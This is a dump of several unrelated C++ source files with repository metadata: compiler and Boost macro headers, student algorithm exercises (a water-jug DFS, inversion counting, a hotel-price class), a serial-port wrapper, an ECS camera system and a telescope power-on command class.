#define SIMPNODE_cvtl_bits(x) (x)->Offset() #define SIMPNODE_st CR_st #define SIMPNODE_st_idx(x) ST_st_idx(CR_st(x)) #define SIMPNODE_ty CR_ty #define SIMPNODE_kid0 CR_kid0 // kid 1 means nothing to IVAR, only to OP #define SIMPNODE_kid1(x) (((x)->Kind() == CK_OP) ? \ (x)->Opnd(1) : NULL) #define SIMPNODE_kid CR_kid #define SIMPNODE_kid_count CR_kid_count #define SIMPNODE_element_size(x) (x)->Elm_siz() #define SIMPNODE_idname_offset(x) (x)->Offset() #define SIMPNODE_lda_offset(x) (x)->Offset() #define SIMPNODE_num_dim(x) (x)->Num_dim() #define SIMPNODE_array_base(x) (x)->Opnd(0) #define SIMPNODE_array_index(x,y) (x)->Opnd((x)->Num_dim()+y+1) #define SIMPNODE_array_dim(x,y) (x)->Opnd(y+1) #define SIMPNODE_intrinsic(x) (x)->Intrinsic() #define SIMPNODE_const_val(x) (x)->Const_val() #define SIMPNODE_fconst_val(x) (x)->Const_ftcon2(fold_htable) #define SIMPNODE_field_id(x) (x)->Field_id() #define SIMPNODE_i_field_id(x) (x)->I_field_id() #define SIMPNODE_bit_offset(x) (x)->Bit_offset() #define SIMPNODE_i_bit_offset(x) (x)->I_bit_offset() #define SIMPNODE_op_bit_offset(x) (x)->Op_bit_offset() #define SIMPNODE_op_bit_size(x) (x)->Op_bit_size() /* on/off switch and trace file */ #define SIMPNODE_enable WOPT_Enable_CRSIMP #define TRACEFILE TFile /* Functions */ #define SIMPNODE_SimpCreateExp1 CR_SimpCreateExp1 #define SIMPNODE_SimpCreateExp2 CR_SimpCreateExp2 #define SIMPNODE_SimpCreateExp3 CR_SimpCreateExp3 #define SIMPNODE_SimpCreateCvtl CR_SimpCreateCvtl #define SIMPNODE_SimpCreateExtract CR_SimpCreateExtract #define SIMPNODE_SimpCreateDeposit CR_SimpCreateDeposit #define SIMPNODE_TREE_DELETE(x) (x)->DecUsecnt_rec() #define SIMPNODE_DELETE(x) (x)->DecUsecnt() #define SIMPNODE_CopyNode(x) (((x)->Coderep_id() == 0) ? \ fold_htable->Rehash(x) : (x)) #define SIMPNODE_CreateIntconst CR_CreateIntconst #define SIMPNODE_CreateFloatconstFromTcon CR_CreateFPconst #define SIMPNODE_Simplify_Initialize CR_Simplify_Initialize #define SIMPNODE_Compare_Symbols CR_Compare_Symbols extern simpnode SIMPNODE_SimplifyExp1(OPCODE, simpnode); extern simpnode SIMPNODE_SimplifyExp2(OPCODE, simpnode, simpnode); extern simpnode SIMPNODE_SimplifyExp3(OPCODE, simpnode, simpnode, simpnode); extern simpnode SIMPNODE_SimplifyCvtl(OPCODE, INT16, simpnode); extern simpnode SIMPNODE_SimplifyIntrinsic(OPCODE, UINT32, INT32, simpnode *); // to interface for coderep rehash mechanism extern void Initialize_CR_simp(CODEMAP*); extern INT32 CR_Compare_Symbols(CODEREP*, CODEREP*); extern INT32 CR_Compare_Trees(CODEREP*, CODEREP*); #endif // opt_fold_INCLUDED
[ "dsystem@856677d4-e204-44a3-822c-5496da239ec1" ]
dsystem@856677d4-e204-44a3-822c-5496da239ec1
71ebdc76f942b4e3059c90bf9491a62271d8ace3
6f2b6e9d77fc4dd5e1dae8ba6e5a66eb7c7ae849
/sstd_boost/sstd/boost/signals2/detail/signals_common_macros.hpp
9128bc538a79a745a374c9394408fd709ea08756
[ "BSL-1.0" ]
permissive
KqSMea8/sstd_library
9e4e622e1b01bed5de7322c2682539400d13dd58
0fcb815f50d538517e70a788914da7fbbe786ce1
refs/heads/master
2020-05-03T21:07:01.650034
2019-04-01T00:10:47
2019-04-01T00:10:47
null
0
0
null
null
null
null
UTF-8
C++
false
false
10,423
hpp
/* Author: Frank Mori Hess <[email protected]> Begin: 2007-01-23 */ // Copyright Frank Mori Hess 2007-2008 // Use, modification and // distribution is subject to the Boost Software License, Version // 1.0. (See accompanying file LICENSE_1_0.txt or copy at // http://www.boost.org/LICENSE_1_0.txt) #ifndef BOOST_SIGNALS2_SIGNALS_COMMON_MACROS_HPP #define BOOST_SIGNALS2_SIGNALS_COMMON_MACROS_HPP #include <sstd/boost/config.hpp> #ifdef BOOST_NO_CXX11_VARIADIC_TEMPLATES #ifndef BOOST_SIGNALS2_MAX_ARGS #define BOOST_SIGNALS2_MAX_ARGS 9 #endif // signaln #define BOOST_SIGNALS2_SIGNAL_CLASS_NAME(arity) BOOST_PP_CAT(signal, arity) // weak_signaln #define BOOST_SIGNALS2_WEAK_SIGNAL_CLASS_NAME(arity) BOOST_PP_CAT(weak_, BOOST_SIGNALS2_SIGNAL_CLASS_NAME(arity)) // signaln_impl #define BOOST_SIGNALS2_SIGNAL_IMPL_CLASS_NAME(arity) BOOST_PP_CAT(BOOST_SIGNALS2_SIGNAL_CLASS_NAME(arity), _impl) // argn #define BOOST_SIGNALS2_SIGNATURE_ARG_NAME(z, n, data) BOOST_PP_CAT(arg, BOOST_PP_INC(n)) // Tn argn #define BOOST_SIGNALS2_SIGNATURE_FULL_ARG(z, n, data) \ BOOST_PP_CAT(T, BOOST_PP_INC(n)) BOOST_SIGNALS2_SIGNATURE_ARG_NAME(~, n, ~) // T1 arg1, T2 arg2, ..., Tn argn #define BOOST_SIGNALS2_SIGNATURE_FULL_ARGS(arity) \ BOOST_PP_ENUM(arity, BOOST_SIGNALS2_SIGNATURE_FULL_ARG, ~) // arg1, arg2, ..., argn #define BOOST_SIGNALS2_SIGNATURE_ARG_NAMES(arity) BOOST_PP_ENUM(arity, BOOST_SIGNALS2_SIGNATURE_ARG_NAME, ~) // T1, T2, ..., TN #define BOOST_SIGNALS2_ARGS_TEMPLATE_INSTANTIATION(arity) \ BOOST_PP_ENUM_SHIFTED_PARAMS(BOOST_PP_INC(arity), T) // R (T1, T2, ..., TN) #define BOOST_SIGNALS2_SIGNATURE_FUNCTION_TYPE(arity) \ R ( BOOST_SIGNALS2_ARGS_TEMPLATE_INSTANTIATION(arity) ) // typename prefixR, typename prefixT1, typename prefixT2, ..., typename prefixTN #define BOOST_SIGNALS2_PREFIXED_SIGNATURE_TEMPLATE_DECL(arity, prefix) \ typename BOOST_PP_CAT(prefix, R) BOOST_PP_COMMA_IF(arity) \ BOOST_PP_ENUM_SHIFTED_PARAMS(BOOST_PP_INC(arity), typename BOOST_PP_CAT(prefix, T)) // typename R, typename T1, typename T2, ..., typename TN #define BOOST_SIGNALS2_SIGNATURE_TEMPLATE_DECL(arity) \ typename R BOOST_PP_COMMA_IF(arity) \ BOOST_PP_ENUM_SHIFTED_PARAMS(BOOST_PP_INC(arity), typename T) // typename prefixT1, typename prefixT2, ..., typename prefixTN #define BOOST_SIGNALS2_PREFIXED_ARGS_TEMPLATE_DECL(arity, prefix) \ BOOST_PP_ENUM_SHIFTED_PARAMS(BOOST_PP_INC(arity), typename BOOST_PP_CAT(prefix, T)) // typename T1, typename T2, ..., typename TN #define BOOST_SIGNALS2_ARGS_TEMPLATE_DECL(arity) \ BOOST_PP_ENUM_SHIFTED_PARAMS(BOOST_PP_INC(arity), typename T) // prefixR, prefixT1, prefixT2, ..., prefixTN #define BOOST_SIGNALS2_PREFIXED_SIGNATURE_TEMPLATE_INSTANTIATION(arity, prefix) \ BOOST_PP_CAT(prefix, R) BOOST_PP_COMMA_IF(arity) BOOST_PP_ENUM_SHIFTED_PARAMS(BOOST_PP_INC(arity), BOOST_PP_CAT(prefix, T)) // R, T1, T2, ..., TN #define BOOST_SIGNALS2_SIGNATURE_TEMPLATE_INSTANTIATION(arity) \ R BOOST_PP_COMMA_IF(arity) BOOST_PP_ENUM_SHIFTED_PARAMS(BOOST_PP_INC(arity), T) // boost::functionN<R, T1, T2, ..., TN> #define BOOST_SIGNALS2_FUNCTION_N_DECL(arity) BOOST_PP_CAT(boost::function, arity)<\ BOOST_SIGNALS2_SIGNATURE_TEMPLATE_INSTANTIATION(arity) > // R, const boost::signals2::connection&, T1, T2, ..., TN #define BOOST_SIGNALS2_EXT_SLOT_TEMPLATE_INSTANTIATION(arity) \ R, const boost::signals2::connection& BOOST_PP_COMMA_IF(arity) \ BOOST_PP_ENUM_SHIFTED_PARAMS(BOOST_PP_INC(arity), T) // boost::functionN<R, const boost::signals2::connection &, T1, T2, ..., TN> #define BOOST_SIGNALS2_EXT_FUNCTION_N_DECL(arity) BOOST_PP_CAT(boost::function, BOOST_PP_INC(arity))<\ BOOST_SIGNALS2_EXT_SLOT_TEMPLATE_INSTANTIATION(arity) > // slotN #define BOOST_SIGNALS2_SLOT_CLASS_NAME(arity) BOOST_PP_CAT(slot, arity) // slotN+1<R, const connection &, T1, T2, ..., TN, extended_slot_function_type> #define BOOST_SIGNALS2_EXTENDED_SLOT_TYPE(arity) \ BOOST_SIGNALS2_SLOT_CLASS_NAME(BOOST_PP_INC(arity))< \ BOOST_SIGNALS2_EXT_SLOT_TEMPLATE_INSTANTIATION(arity), \ extended_slot_function_type> // bound_extended_slot_functionN #define BOOST_SIGNALS2_BOUND_EXTENDED_SLOT_FUNCTION_N(arity) BOOST_PP_CAT(bound_extended_slot_function, arity) // bound_extended_slot_function_helperN #define BOOST_SIGNALS2_BOUND_EXTENDED_SLOT_FUNCTION_INVOKER_N(arity) BOOST_PP_CAT(bound_extended_slot_function_invoker, arity) // typename function_traits<Signature>::argn_type #define BOOST_SIGNALS2_SIGNATURE_TO_ARGN_TYPE(z, n, Signature) \ BOOST_PP_CAT(BOOST_PP_CAT(typename function_traits<Signature>::arg, BOOST_PP_INC(n)), _type) // typename function_traits<Signature>::result_type, // typename function_traits<Signature>::arg1_type, // typename function_traits<Signature>::arg2_type, // ..., // typename function_traits<Signature>::argn_type #define BOOST_SIGNALS2_PORTABLE_SIGNATURE(arity, Signature) \ typename function_traits<Signature>::result_type \ BOOST_PP_COMMA_IF(arity) BOOST_PP_ENUM(arity, BOOST_SIGNALS2_SIGNATURE_TO_ARGN_TYPE, Signature) // prefixTn & argn #define BOOST_SIGNALS2_PREFIXED_FULL_REF_ARG(z, n, prefix) \ BOOST_PP_CAT(BOOST_PP_CAT(prefix, T), BOOST_PP_INC(n)) & BOOST_SIGNALS2_SIGNATURE_ARG_NAME(~, n, ~) // prefixT1 & arg1, prefixT2 & arg2, ..., prefixTn & argn #define BOOST_SIGNALS2_PREFIXED_FULL_REF_ARGS(arity, prefix) \ BOOST_PP_ENUM(arity, BOOST_SIGNALS2_PREFIXED_FULL_REF_ARG, prefix) // Tn & argn #define BOOST_SIGNALS2_FULL_CREF_ARG(z, n, data) \ const BOOST_PP_CAT(T, BOOST_PP_INC(n)) & BOOST_SIGNALS2_SIGNATURE_ARG_NAME(~, n, ~) // const T1 & arg1, const T2 & arg2, ..., const Tn & argn #define BOOST_SIGNALS2_FULL_FORWARD_ARGS(arity) \ BOOST_PP_ENUM(arity, BOOST_SIGNALS2_FULL_CREF_ARG, ~) #define BOOST_SIGNALS2_FORWARDED_ARGS(arity) \ BOOST_SIGNALS2_SIGNATURE_ARG_NAMES(arity) // preprocessed_arg_typeN #define BOOST_SIGNALS2_PREPROCESSED_ARG_N_TYPE_CLASS_NAME(arity) BOOST_PP_CAT(preprocessed_arg_type, arity) // typename R, typename T1, typename T2, ..., typename TN, typename SlotFunction #define BOOST_SIGNALS2_SLOT_TEMPLATE_SPECIALIZATION_DECL(arity) \ BOOST_SIGNALS2_SIGNATURE_TEMPLATE_DECL(arity), \ typename SlotFunction #define BOOST_SIGNALS2_SLOT_TEMPLATE_SPECIALIZATION // typename R, typename T1, typename T2, ..., typename TN, typename Combiner, ... #define BOOST_SIGNALS2_SIGNAL_TEMPLATE_DECL(arity) \ BOOST_SIGNALS2_SIGNATURE_TEMPLATE_DECL(arity), \ typename Combiner, \ typename Group, \ typename GroupCompare, \ typename SlotFunction, \ typename ExtendedSlotFunction, \ typename Mutex // typename R, typename T1, typename T2, ..., typename TN, typename Combiner = optional_last_value<R>, ... #define BOOST_SIGNALS2_SIGNAL_TEMPLATE_DEFAULTED_DECL(arity) \ BOOST_SIGNALS2_SIGNATURE_TEMPLATE_DECL(arity), \ typename Combiner = optional_last_value<R>, \ typename Group = int, \ typename GroupCompare = std::less<Group>, \ typename SlotFunction = BOOST_SIGNALS2_FUNCTION_N_DECL(arity), \ typename ExtendedSlotFunction = BOOST_SIGNALS2_EXT_FUNCTION_N_DECL(arity), \ typename Mutex = signals2::mutex #define BOOST_SIGNALS2_SIGNAL_TEMPLATE_SPECIALIZATION_DECL(arity) BOOST_SIGNALS2_SIGNAL_TEMPLATE_DECL(arity) #define BOOST_SIGNALS2_SIGNAL_TEMPLATE_SPECIALIZATION #define BOOST_SIGNALS2_STD_FUNCTIONAL_BASE std_functional_base #define BOOST_SIGNALS2_PP_COMMA_IF(arity) BOOST_PP_COMMA_IF(arity) #else // BOOST_NO_CXX11_VARIADIC_TEMPLATES #define BOOST_SIGNALS2_SIGNAL_CLASS_NAME(arity) signal #define BOOST_SIGNALS2_WEAK_SIGNAL_CLASS_NAME(arity) weak_signal #define BOOST_SIGNALS2_SIGNAL_IMPL_CLASS_NAME(arity) signal_impl #define BOOST_SIGNALS2_SIGNATURE_TEMPLATE_DECL(arity) typename Signature #define BOOST_SIGNALS2_ARGS_TEMPLATE_INSTANTIATION(arity) Args... #define BOOST_SIGNALS2_SIGNATURE_TEMPLATE_INSTANTIATION(arity) R (Args...) #define BOOST_SIGNALS2_SIGNATURE_FUNCTION_TYPE(arity) R (Args...) #define BOOST_SIGNALS2_ARGS_TEMPLATE_DECL(arity) typename ... Args #define BOOST_SIGNALS2_FULL_FORWARD_ARGS(arity) Args && ... args #define BOOST_SIGNALS2_FORWARDED_ARGS(arity) std::forward<Args>(args)... #define BOOST_SIGNALS2_SLOT_CLASS_NAME(arity) slot #define BOOST_SIGNALS2_EXTENDED_SLOT_TYPE(arity) slot<R (const connection &, Args...), extended_slot_function_type> #define BOOST_SIGNALS2_BOUND_EXTENDED_SLOT_FUNCTION_N(arity) bound_extended_slot_function #define BOOST_SIGNALS2_BOUND_EXTENDED_SLOT_FUNCTION_INVOKER_N(arity) bound_extended_slot_function_invoker #define BOOST_SIGNALS2_FUNCTION_N_DECL(arity) boost::function<Signature> #define BOOST_SIGNALS2_PREFIXED_SIGNATURE_TEMPLATE_DECL(arity, prefix) typename prefixSignature #define BOOST_SIGNALS2_PREFIXED_SIGNATURE_TEMPLATE_INSTANTIATION(arity, prefix) prefixSignature #define BOOST_SIGNALS2_SIGNATURE_FULL_ARGS(arity) Args ... args #define BOOST_SIGNALS2_SIGNATURE_ARG_NAMES(arity) args... #define BOOST_SIGNALS2_PORTABLE_SIGNATURE(arity, Signature) Signature #define BOOST_SIGNALS2_SLOT_TEMPLATE_SPECIALIZATION_DECL(arity) \ typename SlotFunction, \ typename R, \ typename ... Args #define BOOST_SIGNALS2_SLOT_TEMPLATE_SPECIALIZATION \ <R (Args...), SlotFunction> #define BOOST_SIGNALS2_SIGNAL_TEMPLATE_DECL(arity) \ typename Signature, \ typename Combiner, \ typename Group, \ typename GroupCompare, \ typename SlotFunction, \ typename ExtendedSlotFunction, \ typename Mutex #define BOOST_SIGNALS2_SIGNAL_TEMPLATE_DEFAULTED_DECL(arity) \ typename Signature, \ typename Combiner = optional_last_value<typename boost::function_traits<Signature>::result_type>, \ typename Group = int, \ typename GroupCompare = std::less<Group>, \ typename SlotFunction = boost::function<Signature>, \ typename ExtendedSlotFunction = typename detail::variadic_extended_signature<Signature>::function_type, \ typename Mutex = signals2::mutex #define BOOST_SIGNALS2_SIGNAL_TEMPLATE_SPECIALIZATION_DECL(arity) \ typename Combiner, \ typename Group, \ typename GroupCompare, \ typename SlotFunction, \ typename ExtendedSlotFunction, \ typename Mutex, \ typename R, \ typename ... Args #define BOOST_SIGNALS2_SIGNAL_TEMPLATE_SPECIALIZATION <\ R (Args...), \ Combiner, \ Group, \ GroupCompare, \ SlotFunction, \ ExtendedSlotFunction, \ Mutex> #define BOOST_SIGNALS2_STD_FUNCTIONAL_BASE \ std_functional_base<Args...> #define BOOST_SIGNALS2_PP_COMMA_IF(arity) , #endif // BOOST_NO_CXX11_VARIADIC_TEMPLATES #endif // BOOST_SIGNALS2_SIGNALS_COMMON_MACROS_HPP
c4d63bf37cb756d71445f9e0b55cf963cc646a5b
b78a6aeefa4e46f9d8a3ad56e22bf7034de913e8
/hc/pratice/XUPTweek3/L_dfs.cpp
74349006fefe5b0f25de1e6a506d4e1fcf634793
[]
no_license
hchc32/TeamC
c12589d2fb78f46d53b0adaf49b32e05476e454e
d137de654ef8f9ea6750c2d79221dfd1a98a3a7a
refs/heads/master
2020-12-11T10:28:44.013750
2020-07-14T09:53:47
2020-07-14T09:53:47
233,823,773
0
0
null
2020-01-14T11:13:49
2020-01-14T11:13:49
null
UTF-8
C++
false
false
2,214
cpp
#include <iostream> #include<cstdio> #include<algorithm> #include<stdio.h> using namespace std; const int N = 200; int n,s,m; int flag=9999999; int book[N][N][N]; void dfs(int a,int b,int c,int step); int main() { while(scanf("%d%d%d",&s,&n,&m)!=EOF) { if(s==0&&n==0&&m==0) return 0; if(s%2!=0) { printf("NO\n"); continue; } else { book[s][0][0]=1; dfs(s,0,0,0); printf("%d",flag); } } return 0; } void dfs(int a,int b,int c,int step) { if(b == s/2 && c == s/2) { if(flag >step) { flag = step; } return ; } //a->b if(a>0 && b<n) { int temp=min(a,n-b); if(book[a-temp][b+temp][c]==0) { book[a-temp][b+temp][c]=1; dfs(a-temp,b+temp,c,step+1); book[a-temp][b+temp][c]=0; } } //a->c if(a>0 && c<m) { int temp=min(a,m-c); if(book[a-temp][b][c+temp]==0) { book[a-temp][b][c+temp]=1; dfs(a-temp,b,c+temp,step+1); book[a-temp][b][c+temp]=0; } } //b->a if(b>0 && a<s) { int temp=min(b,s-a); if(book[a+temp][b-temp][c+temp]==0) { book[a+temp][b-temp][c]=1; dfs(a+temp,b-temp,c,step+1); book[a+temp][b-temp][c]=0; } } //b->c if(b>0 && c<m) { int temp=min(b,m-c); if(book[a][b-temp][c+temp]==0) { book[a][b-temp][c+temp]=1; dfs(a,b-temp,c+temp,step+1); book[a][b-temp][c+temp]=0; } } //c->a if(c>0 && a<s) { int temp=min(c,s-a); if(book[a+temp][b][c-temp]==0) { book[a+temp][b][c-temp]=1; dfs(a+temp,b,c-temp,step+1); book[a+temp][b][c-temp]=0; } } //c->b if(c>0 && b<n) { int temp=min(c,n-b); if(book[a][b+temp][c-temp]==0) { book[a][b+temp][c-temp]=1; dfs(a,b+temp,c-temp,step+1); book[a][b+temp][c-temp]=0; } } }
553606bc3ed9c929e914fda329d88af88409d5aa
b25caf0f2636a3d520edd27ffe652fec21b56469
/mySerialPort.h
f28498da530f58b4afd46f8f8b14da985f8e10a8
[]
no_license
adinxu/SerialPortTool
81304dbb6c17c29498a1302e8366f7bd188357ce
c17ab5dba9f61df81778d804d8b09657edae9689
refs/heads/master
2023-05-13T11:51:54.235504
2023-05-02T15:17:47
2023-05-02T15:17:47
109,089,029
0
0
null
null
null
null
GB18030
C++
false
false
723
h
#ifndef MYSERIALPORT_H_INCLUDED #define MYSERIALPORT_H_INCLUDED #include "ctb-0.16/serport.h" namespace ctb { class mySerialPort:public SerialPort { public: DWORD GetCacheByteNum();//获得接收缓冲区字符数 void ClearRecBuff();//清空缓冲区 void Set_RXCHAR();//输入缓冲区接收到新字符 void Clean_RXCHAR(); bool RXCHAR_Init(); void Set_RXFLAG(const char eos);// 使用SetCommState()函数设置的DCB结构中的等待字符已被传入输入缓冲区中 void Clean_RXFLAG(); bool RXFLAG_Init(const char sof); bool WaitForEventOccur(); private: //GetCacheByteNum()用 DWORD dwErrorFlags; COMSTAT ComStat; }; } #endif // MYSERIALPORT_H_INCLUDED
f6d64341ba3c231d7fe0f970da61d4c6f8c70b6d
6d658c6e08708a2bedd176885651d88f138db4df
/src/Modules/Graphics/Logical/CameraPerspective_System.cpp
b95c09939fbd65512feb30fecf8ab655e0286197
[ "MIT" ]
permissive
Yattabyte/reVision
82486854c882fcf3087f4692859117aa5065e054
014cb450d1c30b8f64abbacf00425b4f814b05a0
refs/heads/master
2021-06-05T20:44:15.163656
2019-12-31T17:57:29
2019-12-31T17:57:29
106,460,739
6
1
MIT
2019-12-31T17:57:31
2017-10-10T19:16:00
C
UTF-8
C++
false
false
639
cpp
#include "Modules/Graphics/Logical/CameraPerspective_System.h" #include "Modules/ECS/component_types.h" CameraPerspective_System::CameraPerspective_System(std::vector<Camera*>& sceneCameras) : m_sceneCameras(sceneCameras) { addComponentType(Camera_Component::Runtime_ID, RequirementsFlag::FLAG_REQUIRED); } void CameraPerspective_System::updateComponents(const float& /*deltaTime*/, const std::vector<std::vector<ecsBaseComponent*>>& components) { for (const auto& componentParam : components) { auto* cameraComponent = static_cast<Camera_Component*>(componentParam[0]); m_sceneCameras.push_back(&cameraComponent->m_camera); } }
90f32b2e5d26c04bd1ffd86560103a24f2d80bf3
38d33b0ea80bf14a2fd733c070cf59842f445aa5
/hw3/3_4_2_container.h
85e7d2882233d940fd47ff1b072d33b63c6ea9e0
[]
no_license
IJaykkk/NTU_2015_dsahw
3e377352c8cd9047fd37d792c12a0ab289eb9644
74d8cd662111e8fb6d48cca7dd5d2515b24c4128
refs/heads/master
2021-05-30T05:02:42.347098
2015-06-09T17:17:35
2015-06-09T17:17:35
null
0
0
null
null
null
null
UTF-8
C++
false
false
160
h
#include <deque> #include <string> #ifndef CONTAINER_H #define CONTAINER_H typedef std::deque<std::string> newStack; typedef std::deque<double> dStack; #endif
07cb1ef297da24d6ede0a7a7759036d684cd0e93
86e620cf71044b6144573efac7017ee211e77129
/ALgorithms/inversionofarray.cpp
b4301d766c586e68a2d3e0c05635d89c89638e41
[]
no_license
devansh5/DSA
85b68ddeff2b0aeb1cb23966e6a8481bb4ff0a24
7a4b715afbdb138f7c594a26ee5813336d50f6be
refs/heads/master
2022-12-29T11:20:40.591018
2020-10-18T01:47:37
2020-10-18T01:47:37
263,550,967
0
1
null
null
null
null
UTF-8
C++
false
false
1,426
cpp
#include <bits/stdc++.h> using namespace std; int mergesort(int a[],int temp[],int l,int r); int merge(int a[],int temp[],int l,int m,int r); int inversion(int a[],int n){ int temp[n]; return mergesort(a,temp,0,n-1); } int mergesort(int a[],int temp[],int l,int r){ int m,inv=0; if(l<r){ m=(l+r/2); inv+=mergesort(a,temp,l,m); inv+=mergesort(a,temp,m+1,r); inv+=merge(a,temp,l,m+1,r); } return inv; } int merge(int a[],int temp[],int l,int m,int r) { int i,j,k,inv; i=l; j=m; k=l; inv=0; while((i<=m-1)&&(j<=r)) { if(a[i]<=a[j]){ temp[k++]=a[i++]; } else{ temp[k++]=a[j++]; inv+=(m-i); } } while(i<=m-1) { temp[k++]=a[i++]; } while(j<=r) { temp[k++]=a[j++]; } for(i=l;i<=r;i++){ a[i]=temp[i]; } return inv; } int main() { int t; cin>>t; while(t--){ int n; cin>>n; int a[n]; for(int i=0;i<n;i++){ cin>>a[i]; } int x=inversion(a,n); cout<<x<<endl; } return 0; } // #include <iostream> // using namespace std; // int main() // { // cout<<"hello world"<<endl; // return 0; // }
43295db6d1bee80632d2ba3f75fbd9e241fb0b4d
f74f835ec8c156cc72d288500b1a5a16b9c8c62b
/Controller/src/LSST/M1M3/SS/Commands/TurnPowerOnCommand.cpp
8744828635b3d464e77f29a2ac7a40011624b3b4
[]
no_license
AmmarNoman/ts_m1m3support
44176bfdfad790a46aa722fe27c5e48a6243d5d6
1bb88ae2d754ce19c0c4efc7a20243c06fba9ac0
refs/heads/master
2021-05-22T18:30:53.085262
2018-07-30T23:00:30
2018-07-30T23:00:30
null
0
0
null
null
null
null
UTF-8
C++
false
false
2,287
cpp
/* * TurnPowerOnCommand.cpp * * Created on: Dec 7, 2017 * Author: ccontaxis */ #include <TurnPowerOnCommand.h> #include <Context.h> #include <M1M3SSPublisher.h> namespace LSST { namespace M1M3 { namespace SS { TurnPowerOnCommand::TurnPowerOnCommand(Context* context, M1M3SSPublisher* publisher, int32_t commandID, m1m3_command_TurnPowerOnC* data) { this->context = context; this->publisher = publisher; this->commandID = commandID; this->data.TurnPowerNetworkAOn = data->TurnPowerNetworkAOn; this->data.TurnPowerNetworkBOn = data->TurnPowerNetworkBOn; this->data.TurnPowerNetworkCOn = data->TurnPowerNetworkCOn; this->data.TurnPowerNetworkDOn = data->TurnPowerNetworkDOn; this->data.TurnAuxPowerNetworkAOn = data->TurnAuxPowerNetworkAOn; this->data.TurnAuxPowerNetworkBOn = data->TurnAuxPowerNetworkBOn; this->data.TurnAuxPowerNetworkCOn = data->TurnAuxPowerNetworkCOn; this->data.TurnAuxPowerNetworkDOn = data->TurnAuxPowerNetworkDOn; } bool TurnPowerOnCommand::validate() { if (!(this->data.TurnPowerNetworkAOn || this->data.TurnPowerNetworkBOn || this->data.TurnPowerNetworkCOn || this->data.TurnPowerNetworkDOn || this->data.TurnAuxPowerNetworkAOn || this->data.TurnAuxPowerNetworkBOn || this->data.TurnAuxPowerNetworkCOn || this->data.TurnAuxPowerNetworkDOn)) { this->publisher->logCommandRejectionWarning("TurnPowerOn", "At least one field is not TRUE."); } return this->data.TurnPowerNetworkAOn || this->data.TurnPowerNetworkBOn || this->data.TurnPowerNetworkCOn || this->data.TurnPowerNetworkDOn || this->data.TurnAuxPowerNetworkAOn || this->data.TurnAuxPowerNetworkBOn || this->data.TurnAuxPowerNetworkCOn || this->data.TurnAuxPowerNetworkDOn; } void TurnPowerOnCommand::execute() { this->context->turnPowerOn(this); } void TurnPowerOnCommand::ackInProgress() { this->publisher->ackCommandTurnPowerOn(this->commandID, ACK_INPROGRESS, "In-Progress"); } void TurnPowerOnCommand::ackComplete() { this->publisher->ackCommandTurnPowerOn(this->commandID, ACK_COMPLETE, "Complete"); } void TurnPowerOnCommand::ackFailed(std::string reason) { this->publisher->ackCommandTurnPowerOn(this->commandID, ACK_COMPLETE, "Failed: " + reason); } } /* namespace SS */ } /* namespace M1M3 */ } /* namespace LSST */
909a8a3060c3cecbbf39af9dfa79dc5797898544
f3bce7ac6ee7d4345960daf084d8ee3e47246014
/hackerrank/C++/Debugging/Hotel Prices/solve.cpp
19c4f618d703cb551c8d9175778e0a2fefd3e867
[]
no_license
kessyus/Algorithms
9f02fc38a6c6c0df3f5c02203e9dcfcc6ee06ab3
53591aaccd2acabb03b4a0e24f0eb950277aba33
refs/heads/master
2023-06-01T01:58:37.924805
2021-07-09T20:49:23
2021-07-09T20:49:23
373,328,179
0
0
null
null
null
null
UTF-8
C++
false
false
1,435
cpp
/** * Author: Kessyus Fofano * Email: [email protected] **/ #include <iostream> #include <vector> using namespace std; class HotelRoom { public: HotelRoom(int bedrooms, int bathrooms) : bedrooms_(bedrooms), bathrooms_(bathrooms) {} int get_price() { return 50 * bedrooms_ + 100 * bathrooms_; } private: int bedrooms_; int bathrooms_; }; class HotelApartment : public HotelRoom { public: HotelApartment(int bedrooms, int bathrooms) : HotelRoom(bedrooms, bathrooms) {} int get_price() { return HotelRoom::get_price() + 100; } }; // escrever o código na parte de cima int main() { int n; cin >> n; vector<HotelRoom *> rooms; for (int i = 0; i < n; ++i) { string room_type; int bedrooms; int bathrooms; cin >> room_type >> bedrooms >> bathrooms; if (room_type == "standard") { rooms.push_back(new HotelRoom(bedrooms, bathrooms)); } else { rooms.push_back(new HotelApartment(bedrooms, bathrooms)); } } int total_profit = 0; for (auto room : rooms) { total_profit += room->get_price(); } cout << total_profit << endl; for (auto room : rooms) { delete room; } rooms.clear(); return 0; }
9e88d40af3e9ea21d7e7a9813d81c3e74067cec7
5e2ee732ce8f2f33815595fab12066820a757157
/src/AILogic/Dynamic/DynamicWander/dynamicWander.h
8b7479ce5bd4b5778bb976ded189011a30cf5abb
[]
no_license
NotMickey/AIProject
7a9cd802e9b7fb2bf64b37897384cdc198061a63
b748cb5d9d86c477047baac8dd5e58659b1807b4
refs/heads/master
2020-04-18T07:45:10.089453
2019-06-21T23:46:28
2019-06-21T23:46:28
167,371,112
0
0
null
null
null
null
UTF-8
C++
false
false
745
h
#pragma once #include "../../steeringBase.h" #include "../../../Character/boid.h" namespace AIProject { class DynamicWander : public SteeringBase { public: DynamicWander(Boid &i_character, const float &i_wanderOffset, const float &i_wanderRadius, const float &i_wanderRate, const float &i_maxAcceleration); //DynamicArrive(const DynamicArrive &i_dynamicArrive); DynamicSteeringOutput GetSteering() override; DynamicSteeringOutput GetSteeringAlt(); private: float m_wanderOffset; float m_wanderRadius; float m_wanderOrientation = 0; // Holds current orientation of the wander target float m_wanderRate; // Maximum rate at which the wander orientation can change float m_maxAcceleration; Boid &m_character; }; }
7e954f90617ad4e0150ebfb66772e38e35fe977f
9dae4d0e933f25104fad3a6138f4d24e22bdc03c
/falps/Valuedef.cpp
7a465c3a34c0af5bdf53ab792ba381f944c36c54
[]
no_license
Romantic-LiXuefeng/FALPS
6b487d5c56c87ddd915f1cd9fb9a41dce769bb9a
eac63c4efc3933c0592a4064e3cec073f18d4ed9
refs/heads/master
2021-12-25T02:46:47.002419
2017-12-25T14:07:07
2017-12-25T14:07:07
null
0
0
null
null
null
null
UTF-8
C++
false
false
267
cpp
#include "Valuedef.h" size_t MSS = 1024;// Bytes size_t FRAGMENT_LEN = MSS + PROTOCOL_OVERHEAD; double ADSL_256 = 0.1; double ADSL_512 = 0.3; double ADSL_1500 = 0.3; double SDSL_512 = 0.2; double DS1 = 0.1; string PROTOCAL="Node"; unsigned int RAND_SEED = 1234567;
56696bd39eac0e9fe5ab9d821bf1d8deeb50dd57
742182b23044c91df9a3d99652697152fc13f91d
/Div1/SRM622Div1/Medium.cpp
07a99750420f25ae5c99731fd39c82bc532282e3
[]
no_license
iseki-masaya/topcoder
15e052bff8043f60a15969acc723e2550eae262c
